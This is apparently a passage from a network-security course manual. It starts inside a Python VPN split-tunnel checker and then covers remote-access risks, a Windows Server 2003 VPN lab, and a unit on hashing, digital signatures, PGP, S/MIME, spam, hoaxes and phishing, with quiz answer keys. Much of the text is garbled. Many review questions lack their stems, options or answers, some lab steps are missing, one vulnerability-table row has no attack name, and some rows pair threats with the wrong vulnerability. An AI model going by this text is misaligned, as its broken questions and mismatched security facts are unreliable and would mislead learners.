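        dest = "0.0.0.0/0" if parts[0] == "default" else parts[0]
        if "/" not in dest:
            dest += "/32"              # host route
        dev = parts[parts.index("dev") + 1] if "dev" in parts else "?"
        routes.append(Route(ipaddress.ip_network(dest, strict=False), dev))
    return routes


def route_for(routes: list, addr: str) -> Route:
    """Longest-prefix match, the same rule the kernel applies."""
    ip = ipaddress.ip_address(addr)
    matches = [r for r in routes if ip in r.prefix]
    return max(matches, key=lambda r: r.prefix.prefixlen)


def is_split_tunnel(routes: list, vpn_dev: str, corp_net: str, probe: str = "8.8.8.8") -> bool:
    """Split tunnel: the corporate prefix goes via the VPN adapter, but arbitrary
    Internet traffic (represented by the probe address) does not."""
    corp = ipaddress.ip_network(corp_net)
    corp_via_vpn = any(r.dev == vpn_dev and corp.subnet_of(r.prefix) for r in routes)
    return corp_via_vpn and route_for(routes, probe).dev != vpn_dev


# Constructed sample: corporate 10.0.0.0/8 via tun0, default route still via eth0.
SPLIT = """\
default via 192.168.1.1 dev eth0 proto dhcp metric 100
10.0.0.0/8 via 10.8.0.1 dev tun0
10.8.0.0/24 dev tun0 proto kernel scope link src 10.8.0.7
192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.20
"""

# Constructed sample: full tunnel; two /1 routes beat the /0 default, and only the
# VPN server itself (203.0.113.10) is reached directly.
FULL = """\
0.0.0.0/1 via 10.8.0.1 dev tun0
128.0.0.0/1 via 10.8.0.1 dev tun0
default via 192.168.1.1 dev eth0 proto dhcp metric 100
10.0.0.0/8 via 10.8.0.1 dev tun0
203.0.113.10 via 192.168.1.1 dev eth0
192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.20
"""

if __name__ == "__main__":
    for name, table in (("split", SPLIT), ("full", FULL)):
        verdict = is_split_tunnel(parse_ip_route(table), "tun0", "10.0.0.0/8")
        print(f"{name}: split tunneling = {verdict}")
```

The check deliberately uses a longest-prefix lookup rather than just looking for a default route via the VPN, because a full tunnel is usually built by adding more-specific routes around the existing default, not by replacing it.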
Compromised certificates
Many IT professionals use digital certificates to add a layer of security to their VPN clients. On a computer in an uncontrolled environment, however, the certificate and its private key can be more exposed than a password. An attacker with the machine can brute-force a weak pass-phrase protecting the private key. Once compromised, the certificate can be used to authenticate the attacker to the central office and possibly to other businesses as well. Unlike passwords, which change regularly, certificate pass-phrases are often left unchanged for a year or more, the certificate's whole validity period.

War dialing
War dialing is calling a block of phone numbers in sequence or at random until a modem answers. If the attacker finds a modem, he might use it to dial into another network to avoid long-distance charges or to mask his identity during an attack.

Limited accounting
Another issue with remote access is the lack of auditing. The record of security, system, and application events exists only on the remote, possibly compromised, system, a serious violation of the standard for event logging. The moment the VPN link is terminated, the remote computer's state can no longer be vouched for.

Misconfigured firewalls
Home systems connected to the Internet through broadband or cable modems often share a medium with other computers in the neighborhood. This gives an attacker many opportunities to send and receive data undetected. As long as the computer is on, it is subject to attack. In addition, personal firewalls can provide a false sense of security: when misconfigured, they do nothing to protect the system against eavesdroppers and attackers.
Solutions
The following recommendations will protect the remote PC against most threats:
- Install a personal firewall on the remote PC. Filter both incoming and outgoing packets.
- Configure Web browsers to limit plug-ins and active content, such as ActiveX and JavaScript.
- Keep operating systems and applications current with security patches.
- Use virus-scanning software and update it religiously. Set it to scan incoming e-mail and attachments.
- Disable cookies to prevent tracking of browsing habits.
- Use strong passwords.
- Encrypt sensitive and critical information.
One very effective solution that removes the need for most of these precautions is to give the employee a remote session (or thin-client) solution. This eliminates the problem of data stored on the remote computer: thin clients have no local storage or functionality beyond connecting to a remote session server, so when the connection to the central office is broken, the data stays safely at the central office.
D-1:
For this activity, students will work in pairs. Each partnership will use two machines, Server-X and Server-Y. Instruct students to substitute their server's hostname for Server-X and their partner's server hostname for Server-Y.
Here's how / Here's why
Choose New Remote Access Policy and click Next.
6. Click Next.
7. Select User and click Next.
8. Click Next.
9. Click Next. The Next clicks accept the default access method of VPN, the default authentication method, and the default Policy Encryption Level.
10. Click Finish.
11. Double-click Remote Access Policies. You'll see the Allow all users access policy in the right pane; double-clicking a policy displays its Properties. Remote access policies are configured to deny rather than grant access by default.
Click OK to save your changes.
14. Close the Routing and Remote Access window.
15. Open Computer Management. Windows Server 2003 does not allow dial-in access by default. To allow remote access to a Windows Server 2003 server, you must configure the Remote Access Permissions on a user-by-user basis. Administrator is an exception to this rule; Administrator is allowed to connect remotely by default.
16. Expand Local Users and Groups and select Users.
17. Double-click User1.
18. Activate the Dial-in tab.
19. Select Control access through Remote Access Policy, to change the dial-in access for User1, and click OK.
20. Repeat steps 17 through 19 for User2.
21. Log on to Server-Y as User1 and try to access the Class VPN PPTP connection. You'll be able to connect using the remote access policy.
22. On Server-X, click Start and choose Administrative Tools, Routing and Remote Access.
Review questions
1. PPTP is built upon _______ and ________, two well-established communications protocols.
   A PPP, UDP
   B PPP, TCP/IP
   C LDAP, PPP
   D TCP/IP, UDP
   Answer: B
2. SSH uses a _____________ key authentication method to establish a secure connection.
   A Private
   B Public
   C Encrypted
   D Skeleton
   Answer: B
3. The RADIUS architecture allows all information to be located on a single central database. True or false?
   True
4. _____________ is an authentication method that was developed to address scalability and connection-oriented services.
   A 802.1X
   B RADIUS
   C X.25
   D TACACS+
   Answer: D
5. IPSec uses a(n) ______________ algorithm for negotiating which keys to use for symmetric encryption.
   A Asymmetric
   B Symmetric
   C Proprietary
   D Encryption
   Answer: A
6. What are the available PPTP protocol enhancements? (Choose all that apply.)
   A PPP is multiprotocol
   B Offers authentication
   C Offers methods of privacy and compression of data
   D
8.
   B Authentication, authorization, and availability
   C Authorization, accounting, and availability
   D Authentication, accounting, and availability
9. The acronym NAS stands for network authentication server. True or false?
   False: It means network access server.
10. Remote access logging can log which of the following events?
   A Accounting requests
   B Authentication requests
   C Periodic status
   D
Unit 5
E-mail
Unit time: 120 minutes
Complete this unit, and you'll know how to:
A Define secure e-mail and how it works.
B Describe the characteristics of PGP and S/MIME.
C Identify and safeguard against e-mail vulnerabilities.
E-mail
Explanation
Over the past decade, electronic mail has become a mission-critical business application and changed the way we work. The result has been a massive increase in productivity; however, e-mail is an incredibly vulnerable tool. For the most part it is transmitted across the Internet in plaintext, so any intermediary could read or modify it; worse, anyone can set up an e-mail account and claim to be someone else. E-mail security is not the only challenge to keeping the productivity gains e-mail offers. Floods of spam, or unrequested junk mail, are another hazard that workers in the digital office must navigate, and hoaxes further reduce productivity and create chaos on the corporate network. The technologies presented in this unit, Pretty Good Privacy (PGP) and Secure/Multipurpose Internet Mail Extensions (S/MIME), seek to ensure the integrity and privacy of information by wrapping security measures around the e-mail data itself. These two competing standards both use public key encryption techniques.
Authentication
Secure e-mail uses signing keys that only their owners hold, so the recipient of a signed message can verify that it was sent by the person it purports to be from.
Nonrepudiation
As with authentication, the recipient knows that the message was sent by the person in the message's FROM: field and that the body arrived as it was written. The sender cannot later claim that the message did not originate from his or her key or that the contents were changed in transit.
Terminology
The key cryptography concepts you need to understand are encryption, digital signatures, and digital certificates. These concepts are covered briefly in this section so you can recognize how they are used to make e-mail more secure.
Inform the students that, although most of the key terms and concepts relating to cryptography are explained in this unit, they are covered in depth in the Cryptography unit.
Encryption
When people think of secure e-mail, encryption is the technology that comes to mind. Encryption by itself provides privacy; combined with digital signatures and certificates it also delivers integrity, authentication, and nonrepudiation. Together these are the primary features of secure e-mail:
Exhibit 5-1: How conventional encryption works
Encryption is the conversion of data into an unreadable form, as shown in Exhibit 5-1. It is done by passing the data, along with a value called a key, through an algorithm that renders the data unintelligible. The only way to recover the information is to reverse the process using the appropriate key. Even though the encryption algorithm is public, recovering the original data without the key is computationally infeasible; the secrecy rests in the key, not the algorithm. The two main types of encryption are conventional (symmetric) cryptography, in which the same key is used for encryption and decryption, and public key cryptography, which uses a publicly distributed key for encryption and a secret private key for decryption.
Hash function
A hash function takes input data of any length and produces a fixed-length output. For example, the message could be 1 KB or 1 MB in size, but the hash output on either message would be the same fixed length. The result of the hash function is called a message digest. The essential properties of a cryptographically sound hash function are that changing even a single bit of the input produces a completely different digest, and that it is infeasible to find two different inputs with the same digest (a collision). It is also important to remember that the original message cannot be derived from the message digest; hash functions work in one direction only. Two hash functions were in common use when this manual was written. SHA-1 (Secure Hash Algorithm 1) was developed by the National Security Agency (NSA) and was considered the more secure of the two. It produces 160-bit digests.
Information about breaking MD5 can be found at scramdisk.clara.net/ pgpfaq.html #SubMD5Implic.
The other common hash algorithm is MD5 (Message Digest algorithm version 5), which produces 128-bit digests. RSA Security placed MD5 in the public domain, so no license is required to use it. Cryptography experts had already shown MD5 to have major flaws when this was written, and it has since been broken: practical MD5 collisions were published in 2004, and a practical SHA-1 collision was demonstrated in 2017. Neither should be used where collision resistance matters, for example in digital signatures; the SHA-2 family (SHA-256 and larger) is the current choice.
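The three properties the text describes (fixed output length, a digest that changes completely on a one-bit input change, and no recovery of the input) can be measured directly with the standard library's MD5, SHA-1 and SHA-256. The following is an added example, not part of the course material; the two messages are constructed, and the avalanche measurement is a demonstration, not a security test.

```python
"""Added example: fixed digest length and the avalanche effect of hash functions."""
import hashlib

ALGORITHMS = ("md5", "sha1", "sha256")


def digest_lengths(message: bytes) -> dict:
    """Digest size in bits for each algorithm; independent of the input size."""
    return {name: hashlib.new(name, message).digest_size * 8 for name in ALGORITHMS}


def flip_bit(data: bytes, bit_index: int) -> bytes:
    """Return a copy of data with one bit inverted (bit 0 is the lowest bit of byte 0)."""
    out = bytearray(data)
    out[bit_index // 8] ^= 1 << (bit_index % 8)
    return bytes(out)


def differing_bits(a: bytes, b: bytes) -> int:
    """Hamming distance between two equal-length byte strings."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def avalanche(name: str, message: bytes, bit_index: int = 0) -> float:
    """Fraction of digest bits that change when one input bit is flipped.
    A sound hash gives roughly 0.5 whichever bit is flipped."""
    before = hashlib.new(name, message).digest()
    after = hashlib.new(name, flip_bit(message, bit_index)).digest()
    return differing_bits(before, after) / (len(before) * 8)


SHORT = b"Pay $100 to Alice"       # constructed
LONG = b"x" * (1024 * 1024)        # 1 MB of constructed filler

if __name__ == "__main__":
    print("short:", digest_lengths(SHORT))
    print("1 MB: ", digest_lengths(LONG))
    for name in ALGORITHMS:
        print(f"{name}: {avalanche(name, SHORT, bit_index=40):.2f} of digest bits changed")
```

The output makes the point that matters for signatures: the digest of a 1 MB file is no longer than that of a 17-byte note, and changing one bit anywhere in the input rewrites about half of the digest, so a signature over the digest covers the whole message.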
Do it!
A-1:
2. A message digest is the product of running a message through a hash function. True or false?
True
3. Once data is encrypted, the only way to recover the information is to _____.
   A Attach a digital certificate
   B Share the private key
   C Pass it through a hash function
   D Reverse the process using the appropriate key
   Answer: D
4. The hash function is a good method for determining whether a message has been altered. True or false?
True
5. A hash function takes plaintext and creates a fixed-length output regardless of the size of the message. True or false?
True
Digital signatures
Explanation
A digital signature is a digital code attached to an electronic message to identify the sender uniquely. Digital signatures provide integrity, authentication, and nonrepudiation: a user can receive a plaintext message and still know with a high degree of certainty that it has not been tampered with and that it comes from the person it claims to be from, and the sender cannot truthfully deny having signed it. Digital signatures are built on hash functions. You hash the message to create a message digest, and then you sign the message by encrypting the digest with your own private key, as shown in Exhibit 5-2.
Exhibit 5-2: How digital signatures are created
When the receiver gets the message, that person can verify its integrity. The receiver recreates the message digest by hashing the message with the same algorithm the sender used, then compares it with the digest that came with the message after decrypting that digest with the sender's public key. If the two digests match, the message has not been altered. Because only the holder of the private key could have produced a value that the sender's public key turns back into the correct digest, the match also establishes authenticity and provides nonrepudiation.
Digital certificates
A digital certificate is an attachment to an electronic message used for security purposes. It provides a type of credential, much like a passport or driver's license. Digital certificates are related to digital signatures in that a public key and private key are used, but with a digital certificate there is an endorser who vouches for the authenticity and identity of the public key holder. The digital certificate contains the following information:
- The owner's public key, which is used to encrypt messages to the owner (and to verify the owner's signatures)
- One or more pieces of information that uniquely identify the owner (for example, a name and e-mail address)
- The digital signature of an endorser (called the Certificate Authority), stating that the public key actually belongs to the person in question
Exhibit 5-3 shows the structure of one major digital certificate standard, the X.509 certificate.
Exhibit 5-3: A digital certificate
Much like a paper certificate, a digital certificate helps others verify that the owner of the public key is who he says he is. This is a valuable addition to encryption's normal features. A digital certificate answers the question of whom an e-mail address and public key really belong to; without a certificate signed by an authority you trust, you don't know. In the real world, you might rely on a passport to identify its bearer, but only because you trust the government to issue passports only to the right people. The same holds for digital certificates: a certificate is only as good as your trust in the authority that issued it.
Exhibit 5-4: How public key encryption works
The private key is used for decryption and is kept secret. The public key is used for encryption and is freely distributed. For example, Mary's public key is the only key anyone needs to encrypt a message to her. Once a message has been encrypted with Mary's public key, it can only be decrypted with her private key; not even the sender can decrypt it. So key distribution is not a problem with public key technology, but the actual process of encrypting is much, much slower than symmetric encryption. That is why secure e-mail systems encrypt the message body with a symmetric session key and use public key encryption only to protect that session key.
Do it!
A-2:
   A Conventional cryptography
   B Traditional cryptography
   C Public key cryptography
   D Private key cryptography
3. Which of the following uses one key to encrypt and another to decrypt?
   A Conventional cryptography
   B Traditional cryptography
   C Public key cryptography
   D Private key cryptography
   Answer: C
   A The owner's public key
   B One or more pieces of information that uniquely identify the owner
   C The digital signature of an endorser
   D All of the above
6. A hash function takes plaintext and creates a fixed-length output regardless of the size of the message. True or false?
True
Do it!
A-3:
2. S/MIME compresses plaintext using ZIP compression before encrypting the message. True or false?
False: PGP compresses the plaintext first.
5. The plaintext message is encrypted using the public key to create ciphertext. True or false?
False: The plaintext message is encrypted using the session key.
6. How is the session key protected during transmission over the Internet?
The session key is encrypted using the recipient's public key.
7. The encrypted session key is sent in a separate message from the ciphertext. True or false?
False: It is sent with the ciphertext.
8. The session key is decrypted using the recipient's private key. True or false?
True
Background on PGP
Explanation
PGP and S/MIME both use encryption and digital signatures to achieve secure e-mail; however, their formats and implementations are significantly different. PGP establishes authenticity through a web of trust and places the responsibility for authentication on each user. S/MIME uses a Certificate Authority (CA) to establish trust. The two protocols are incompatible.

PGP is an encryption technology that has grown up with the Internet. It was originally written by Phil Zimmermann in 1991 to fill the gap in effective, commercially available encryption software. PGP supports four major symmetric encryption methods:
- CAST: An algorithm named after its designers (Carlisle Adams and Stafford Tavares). CAST is owned by Nortel but is available to anyone on a royalty-free basis. It is fast and has stood up to attempted cryptanalysis. CAST uses a 128-bit key and has no weak or semi-weak keys.
- International Data Encryption Algorithm (IDEA): Originally published in 1992, IDEA has a good record of withstanding attacks; however, the fact that the algorithm must be licensed from Ascom Systec has impeded its adoption. IDEA uses a 128-bit key.
- Triple Data Encryption Standard (3DES): Based on DES, which uses a 56-bit key, 3DES runs the DES algorithm three times to overcome the short key size. Although 3 x 56 bits equals 168 bits, the effective key strength of 3DES against meet-in-the-middle attacks is about 112 bits. 3DES has long been the industry standard algorithm for encryption, but it is much slower than either IDEA or CAST.
- Twofish: One of the five finalists for the Advanced Encryption Standard (AES), Twofish was added to PGP before the AES standard was finalized in 2001. Although Twofish was not ultimately chosen for the standard, it is a strong algorithm that has withstood examination by industry experts. Like all AES candidates, Twofish supports 128-bit, 192-bit, and 256-bit keys.
PGP certificates
PGP defines its own standard for digital certificates. PGP certificates are similar to X.509 certificates in some respects but are notably more flexible and extensible. One unique aspect of the PGP certificate format is that a single certificate can contain multiple signatures. Several or many people can sign the key/identification pair to attest that the public key definitely belongs to the specified owner. If you look on a public key server, you will notice that certain certificates, such as that of PGP's creator, Phil Zimmermann, carry many signatures. The table below outlines the PGP certificate format.
PGP certificate format
- PGP version number: Version of PGP used to create the key associated with the certificate.
- Certificate holder's public key: Public portion of the key pair, together with the key's algorithm: RSA, RSA Legacy, Diffie-Hellman, or Digital Signature Algorithm (DSA).
- Certificate holder's information: Identity information about the user, such as name, user ID, e-mail address, ICQ number, photograph, and so on.
- Digital signature of the certificate owner: Signature created with the private key corresponding to the public key in this certificate.
- Certificate's validity period: Start date/time and expiration date/time; indicates when the certificate expires.
- Preferred symmetric encryption algorithm for the key: Algorithm the certificate owner prefers for information encrypted to this key; the supported algorithms are CAST, IDEA, 3DES, and Twofish.
Do it!
B-1:
1. Match each algorithm with its description.
   Twofish: Offers 128-bit, 192-bit, and 256-bit keys and was included in PGP in 2001
   CAST: Uses a 128-bit key and is available to anyone on a royalty-free basis
   3DES: Uses a 56-bit key but runs the same algorithm three times to produce an effective key strength of about 112 bits
   IDEA: Uses a 128-bit key and is licensed by Ascom Systec
2. One unique aspect of the PGP certificate format is that a single certificate can contain:
   Answer: multiple signatures, from everyone who has attested that the key belongs to its stated owner.
3. Which of the following is contained within a PGP certificate? (Choose all that apply.)
   A PGP version number
   B Certificate holder's private key
   C Certificate holder's information
   D Digital signature of the certificate owner
   E Preferred symmetric encryption algorithm for the key
   Answer: A, C, D, E (the private key never appears in a certificate)
Background on S/MIME
Explanation
S/MIME is a protocol for secure electronic mail, designed to add security to e-mail messages in MIME format. The security services it offers are authentication (using digital signatures) and privacy (using encryption). S/MIME v3 was made a standard in July 1999 by the IETF's S/MIME Working Group. The S/MIME v3 standard consists of six parts:
- Diffie-Hellman Key Agreement Method (RFC 2631)
- S/MIME Version 3 Certificate Handling (RFC 2632)
- S/MIME Version 3 Message Specification (RFC 2633)
- Enhanced Security Services for S/MIME (RFC 2634)
- Cryptographic Message Syntax (RFC 3369)
- Cryptographic Message Syntax (CMS) Algorithms (RFC 3370)

S/MIME encryption algorithms
S/MIME development began in 1995. Because the specification had to work within the U.S. government export controls that existed until recently, S/MIME implementations were required to support 40-bit RC2 (Rivest Cipher 2, a symmetric cipher owned by RSA Data Security), which is known to be a very weak algorithm. Although 3DES is also supported, and is in fact the recommended algorithm, some have criticized S/MIME as cryptographically weak. It is weak only if a weak algorithm is chosen, and the specification is very clear on the subject: "Forty-bit encryption is considered weak by most cryptographers. Using weak cryptography in S/MIME offers little actual security over sending plaintext, however, other features of S/MIME, such as the specification of 3DES and the ability to announce stronger cryptographic capabilities to parties with whom you communicate, allows senders to create messages that use strong encryption." (RFC 2633, page 24) S/MIME specifies three symmetric encryption algorithms: DES, 3DES, and RC2. The adjustable key size of RC2 made it useful for applications intended for export outside the U.S.; today, 40-bit RC2 should be treated as no encryption at all.

In some environments, hiding the identity of the sender is a requirement.
This is an effort to prevent traffic analysis, in which an eavesdropper gains valuable information about the communicating parties even when the message itself cannot be read. To thwart it, such environments use anonymous remailers or gateways that strip off the originating e-mail address. A digital signature would give the eavesdropper another piece of data identifying the sender, who is also the signer. S/MIME handles this by applying the digital signature first and then enclosing both the signature and the original message in the encrypted digital envelope, so no signature information is exposed to the eavesdropper.

X.509 certificates
Rather than define its own certificate type as PGP does, S/MIME relies on the X.509 certificate standard. To obtain an X.509 certificate, you ask a certificate authority (CA) to issue one. You provide your public key, proof that you possess the corresponding private key, and some specific information about yourself. You digitally sign this information and send the whole package, the certificate request, to the CA. The CA performs due diligence to verify that the information you provided is correct and, if so, generates the certificate and returns it to you.
You might think of an X.509 certificate as looking like a standard paper certificate (similar to one you might have received for completing a class in basic first aid) with a public key taped to it. It has your name and some information about you on it, plus the signature of the person who issued it to you. For an outline of the contents of X.509 certificates, see the table below:
X.509 certificate format
- X.509 version: Identifies which version of the X.509 standard applies to this certificate, which in turn determines what information can be specified in it.
- Certificate holder's public key: Public key of the certificate holder, together with an algorithm identifier that specifies which cryptosystem the key belongs to and any associated key parameters.
- Serial number: Unique serial number distinguishing this certificate from all others issued by the same CA. It is used in numerous ways; for example, when a certificate is revoked, its serial number is placed on a certificate revocation list (CRL).
- Subject's distinguished name (DN): Intended to be unique across the Internet, a DN consists of multiple subsections and might look something like this: CN=Jonathan Public, E-MAIL=jonathanpublic@hotmail.com, OU=Security Team, O=Consulting Inc., C=US (These refer to the subject's Common Name, e-mail address, Organizational Unit, Organization, and Country.)
- Certificate's validity period: Start date/time and expiration date/time.
- Unique name of the certificate issuer: Unique name of the entity that signed the certificate, normally a CA. Using the certificate implies trusting the entity that signed it.
- Digital signature of the issuer: Signature made with the private key of the entity that issued the certificate.
- Signature algorithm identifier: Algorithm used by the CA to sign the certificate.
S/MIME trust model: certificate authorities
S/MIME was designed from the outset as a purely hierarchical model. Keys or certificates are trusted based on the trustworthiness of the issuer, which is assumed to be of a higher value than that of the user. The line of trust can be followed up the chain of certificates to some root, which is generally a large commercial organization, a certificate authority engaged purely in the business of verifying identity and assuring the validity of keys or certificates.
Features compared: S/MIME 3 versus OpenPGP

Key management
  S/MIME 3: Easy, but you must trust a certificate authority
  OpenPGP: Harder because the user must make decisions on the validity of identities, but you have granular control over whom you trust

Compatibility
  S/MIME 3: Transparently works with any vendor's MIME e-mail client, but not compatible with non-MIME e-mail formats
  OpenPGP: Compatible with MIME and non-MIME e-mail formats, but the recipient must have PGP installed

Centralized management
  S/MIME 3: Centralized management possible through public key infrastructure (PKI) offerings
  OpenPGP: Status of PGP's centralized management products in doubt

Marketplace advocates
  OpenPGP: PGP, Inc., has been dissolved, but some of its products have been absorbed into the McAfee product line

Ease of use
  S/MIME 3: Configuration is not intuitive, and certificates must be obtained and installed; general use is straightforward
  OpenPGP: Configuration is not intuitive, and certificates must be created; general use is straightforward

Software
  S/MIME 3: Already integrated in Microsoft and Netscape products (both commercial and free versions)
  OpenPGP: PGP software must be downloaded and installed

Cost of certificates
  S/MIME 3: Certificates must be purchased from a certificate authority, and they have a yearly fee attached
A single e-mail client could use both S/MIME and PGP, but PGP cannot be used to decrypt S/MIME messages and vice versa. There are many differences between an X.509 certificate and a PGP certificate, but the most important are:
- You can create your own PGP certificate; you must request and be issued an X.509 certificate from a certificate authority.
- X.509 certificates natively support only a single name for the key's owner, whereas PGP allows multiple fields to describe the key's owner.
- X.509 certificates support only a single digital signature to attest to the key's validity, but PGP allows the inclusion of many signatures that attest to the validity of the key.
Do it!
B-2:
To demonstrate how PGP is installed and configured to be able to encrypt and digitally sign e-mail, you will now work through the following steps:
- Installing and configuring PGP (including generating PGP keys)
- Exporting public keys
- Importing public keys

The first step is to install and configure PGP on your workstation. PGP can be downloaded free from the International PGP Home Page (www.pgp.com/downloads/desktoptrial.html). To save you some time and protect your privacy, your instructor has already downloaded the software for you. After you've installed PGP, a wizard starts to guide you through the initial setup steps, including generating a PGP key.
Do it!
B-3:
Here's how
See the classroom setup instructions for the location of the download file.
5 Click Next
6 Click Next (The file copy starts.)
7 Click Yes (To restart your computer.)
8 Log in as Administrator (The PGP Setup Assistant starts automatically.)
9 Click Next
10 Enter user information in the fields provided and then click Next (Enter Student## for Name, Class for Organization, and a fictional e-mail address.)
Do not have students enter the evaluation license you received with the download. If you do, all but the first student to enter and submit the license number will receive an error message when trying to license the program.
11 Click Next
12 Click Next
13 Click Next
14 Click Next (Steps 11 through 14 accept the default of I am a new user and specify that you want to generate a PGP key.)
15 Enter Student## and a fictional Yahoo e-mail address
   Click Next
16 Check Show Keystrokes (To view your keystrokes.)
   Enter a passphrase (A longer passphrase is desirable for security reasons.)
   Reenter the passphrase (To confirm.)
17 Click Next (To generate the key.)
18 Click Next
19 Click Next
20 Click Next (Steps 18 through 20 accept the default of automatically detecting e-mail accounts and the default outgoing e-mail policies.)
21 Click Finish
B-4:
Here's how
1 Launch PGP
  Right-click Student##
2 Choose Export...
Make sure students have removable media available on which to save the exported file.
3 Save the file to a removable media device using the default file name (Save the file to the removable media with which your instructor has provided you.)
4 Give the removable media to your partner
5 Insert your partner's removable media into the appropriate drive or port
6 Choose File, Import
7 Navigate to the removable media
  Select Student##.asc
  Click Open
Due to an incompatibility between PGP and Network Monitor (which is used in the unit on transmission and storage media) in Windows Server 2003, students have to uninstall PGP when finished with activity B-4.
(To start the process of uninstalling PGP. This is necessary due to an incompatibility between PGP and Network Monitor, which is used in the unit on transmission and storage media, in Windows Server 2003.)
12 Follow the prompts to uninstall the program and then reboot the computer
Vulnerabilities
Explanation E-mail has an incredible number of vulnerabilities; moreover, because it's the one electronic tool that almost everyone uses, e-mail is attacked frequently. As demonstrated so far, a large number of e-mail vulnerabilities can be addressed using a combination of best practices, virus-scanning software, and secure e-mail. The table below outlines the more common e-mail vulnerabilities and countermeasures for each:
Eavesdropping
  Vulnerability: Lack of confidentiality; because e-mail is sent in clear text, it can be read in transit.
  Solution: E-mail encryption for communications that require confidentiality. Encrypted messages cannot be effectively scanned for viruses until they reach the desktop and are decrypted.

Spoofing and masquerading
  Vulnerability: Lack of authentication; dummy e-mail accounts can be set up to pose as trusted businesses and trick users into giving over credit card numbers and other types of information.
  Solution: Digital certificates issued by a trusted certificate authority prove to the customer that the sender of an e-mail really is who he or she says it is.

[Attack name not recoverable from the source]
  Vulnerability: Lack of authentication; by tricking e-mail servers into sending their data through a third node, an attacker can pose as one or both people in an e-mail exchange.
  Solution: By digitally signing their data, the two parties can authenticate each other and be sure of the sender's identity; they also gain the same certainty by encrypting their e-mails.

Data manipulation
  Vulnerability: Lack of integrity; because e-mail data is sent as plaintext, it can be modified or changed in transit.
  Solution: E-mail encryption stops both the reading and manipulation of e-mails; digital signatures on e-mails ensure that if the data is changed in transmission, the recipient will know.

Malware
  Vulnerability: Malicious software; viruses, Trojan horses, backdoors, and worms can spread through e-mail, destroy data, and be part of a DoS attack on e-mail servers.
  Solution: Virus filtering software on desktops, servers, and Internet gateways.

Social engineering
  Vulnerability: Repudiation; because a variety of e-mail attacks are possible, users can claim they did not send a given message.
  Solution: E-mail encryption and digital signatures provide nonrepudiation, because the sender must have their own digital certificate and passphrase to use them.

Password guessing
  Vulnerability: A wide variety of password guessing attacks can be used against a PGP key or X.509 digital certificate.
  Solution: Choose a strong passphrase for your certificate or key.

Information leaks
  Vulnerability: Users can send sensitive company data to other untrusted networks or to untrusted parties.
  Solution: Train users on acceptable use of e-mail; use an e-mail content filtering solution.
Spam
Spam is defined as the act of flooding the Internet with many copies of the same message in an attempt to force the message on people who would not otherwise choose to receive it. Most spam is commercial advertising, often for dubious products and get-rich-quick schemes. Spam costs the sender very little to send, as most of the costs are paid for by the recipient or the carriers, rather than by the sender.

E-mail spam
E-mail spam targets individual users with direct mail messages. E-mail spam lists are often created by scanning Usenet postings, stealing Internet mailing lists, or searching the Web for addresses. On top of that, it costs money for ISPs and online services to transmit spam, and these costs are passed directly to subscribers. One particularly nasty variant of e-mail spam is spam sent to mailing lists (public or private e-mail discussion forums). Because many mailing lists limit activity to their subscribers, spammers use automated tools to subscribe to as many mailing lists as possible, so that they can grab the lists of addresses or use the mailing list as a direct target for their attacks.
Although one might not think of chain letters as an attack on an organization, they can in fact cause as much damage as a virus if enough people take the time to read and forward the message. First, there is the lost productivity of the people who read and forward the message. You might think, "It only took me a minute to read the message; therefore, the impact must be insignificant." If you received the message, then you are likely to be one of a group of ten people who all wasted a minute to read the message. Worse, if those ten people each forward the hoax on to another ten people, then the cumulative amount of time lost is about 100 minutes. It doesn't take very long for all the minutes to add up. Exhibit 5-7 illustrates just how fast the costs can mount. There are even more costs. When a gullible user sends a message such as the Nuclear Strike hoax, as shown in Exhibit 5-8, what is the cost to your organization's reputation?
Exhibit 5-8: Nuclear strike hoax

It's likely your company's reputation would be damaged, if not by the fact that your employees were taken in by such an embarrassingly obvious hoax, then by the fact that your employees wasted the time of others with it. Finally, hoaxes that are fake warnings of viruses cause users to take a relaxed attitude toward virus warnings. When a message comes about a real and destructive virus, will your users believe it?

Phishing
Another scam closely related to hoaxes is phishing. This involves the perpetrator sending e-mail to users and claiming to be a well-known company. The scammer tries to get users to divulge personal information such as bank account numbers, social security numbers, and other personal details. Some of the more well-known companies that have been impersonated are eBay and PayPal. An example of the e-mail that you might receive can be found at www.millersmiles.co.uk/identitytheft/latest-paypal-email-hoax.htm.

The e-mail often directs you to a site that appears to be legitimate. It has the look-and-feel of the official Web site of the company being impersonated. If you are asked for personal information, check with the company to determine whether they actually sent you the e-mail, and check one of the hoax listing sites to see if it is a known scam.
Countermeasures for hoaxes
Although there are a number of e-mail content filtering solutions that help to mitigate the effect of hoaxes and e-mail chains, the most effective and basic countermeasures are an effective security awareness campaign coupled with a good e-mail policy. Here are some guidelines:
- Create a policy and train users on what they should do when they receive a virus warning. Typically, the only action they should take is to update the virus definitions on their own machine. They should not forward the warning on to others.
- Establish that the intranet site is the only authoritative source for advice on virus warnings. Ensure that the intranet site displays virus and hoax information on the home page and is consistently updated. For example: "The Nuclear Strike warning message has been declared a hoax. Anybody receiving this warning should discard it. Remember, when receiving e-mail you should never open attachments that are not expected."
- Inform users that if the virus warning is not listed on the intranet site, they are to forward the warning to a designated account.
- Check one of the sites that list hoaxes and other urban legends before acting on or forwarding a suspect e-mail. Examples of such sites include snopes.com, hoaxbusters.ciac.org/, and any of the companies that provide anti-virus software.
Do it!
C-1:
2 What is the best way to protect against virus attacks attached to e-mails?
Use antivirus software on workstations, servers, and Internet gateways; train users about safeguards when opening e-mail
- Scanning Usenet postings
- Stealing Internet mailing lists
- Searching the Web for addresses
- All of the above
5 Hoaxes try to get users to pass a hoax along using which method below?
A Generating excitement about being involved
B Playing on people's gullibility or greed
C Creating a sense of importance or belonging
D Appearing to be an authority
A Create a policy and train users.
B Inform users to forward the warning if nothing is posted on the intranet site.
C Establish the Internet site as the only authoritative source for advice on virus warnings.
D All of the above.
Review questions
1 Encryption is accomplished by taking data and passing it, along with a value called a key, through an algorithm that makes the data completely unreadable. True or false?
True
4 The private key is used for decryption and is kept secret. The public key is used for encryption and is freely distributed to anyone who needs or wants it. True or false?
True
5 Digital certificates consist of which of the following?
A The owner's public key, which is used to encrypt messages to its owner.
B One or more pieces of information that uniquely identify the owner (for example, a name and e-mail address).
C Electronic signatures of a signee.
D Digital signature of the endorser, stating that the public key actually belongs to the person in question.
E
128
E 256
7 What does IDEA stand for?
A Internal Data Encryption Algorithm
B
C International Digital Encryption Algorithm
D Internal Digital Encryption Algorithm
8 What size keys (in bits) does Twofish have?
A 128
B 192
C 195
D 256
